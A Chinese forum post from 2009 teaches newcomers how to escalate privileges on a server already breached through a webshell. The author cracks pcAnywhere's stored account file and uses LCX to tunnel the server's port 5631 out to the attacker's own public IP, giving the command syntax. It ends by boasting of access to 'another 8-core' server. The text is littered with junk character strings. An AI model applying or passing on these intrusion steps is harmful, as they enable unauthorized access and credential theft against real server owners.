|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
: r' J& D4 h5 x. x/ A W# V& P% \+ A
提权方法:pcanywhere+LCX
* Q% K: C4 X* {: o6 ]% g* Q6 I! ?( Z5 s/ x4 y" y" w, M& v
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。6 x) q7 U9 P8 K5 ^
, M4 _" J4 z1 Z l0 T9 z
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。. y. t8 |# P( B+ Z. s4 g
7 V4 q( ^! `4 n4 P& D
3 e% Z; p; t" J# `4 W$ D( D7 S查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。; N- F; i: H& y! e3 O* S% P% |
( h! s4 S& ~7 b1 C2 |) ~
4 t+ V( [3 N# }; Y, F呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。. v& M X: H; U: z; T! c
; o2 h8 G2 Z O: y9 M; U' I f
H, z0 s+ u& J" V$ ?2 c( c
& M. K4 f* J& |; o7 x7 g; @2 B
$ e( ^+ q( s1 }+ ]4 {3 ]
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``2 i' V( C3 A/ a' o/ C
6 J9 ~2 u, A/ y% S4 t8 Z/ u( @* n( y
/ O/ ]. e/ N! z& n$ ?LCX的用法再简单说下:
) J- p& L, @; A4 X7 P9 n- i+ w6 s# V8 K
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
- T& z$ ^# f" \: A' i$ u3 G. }
8 X7 L o1 y# Q本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
# @1 A' `& P7 [+ S7 ~& B! L$ x! ~ Y" |* P
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
: _: |9 S' |* Q顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
$ r$ A, D5 H% ]7 B
. ?0 @. E) J: _( N% }' W. Q( Q1 ?
4 P1 f- [9 N$ w! ]
/ t( J7 H: W% x8 \; W% h/ i2 {: ~5 v
, C- |8 l2 P) S* z& F4 x. h; g呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
0 e0 B' k5 h3 ^4 c( C9 ^( x' H8 C' A1 N- C/ T+ a9 U
. G3 m( \; k% W/ u- i
# r4 E2 @9 y. n# R; J) |& s2 r# `8 g, O7 D# h7 M
我们本地连接试试,输入我们刚破解的账号密码
/ L% L: ]" O4 t, D' a* i Z+ l0 i! p, ^& _ O% d [
! f. D1 ^5 O, y; M# k" z/ V
呵呵``连接成功,服务器不错,又一个8核^︵^/ v( S( ^. T8 H' o/ t
' q v |% j- \8 w) i1 N7 B3 v* Y" n0 G0 M" E- \1 c" h
/ w9 Q l: b* q/ `
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
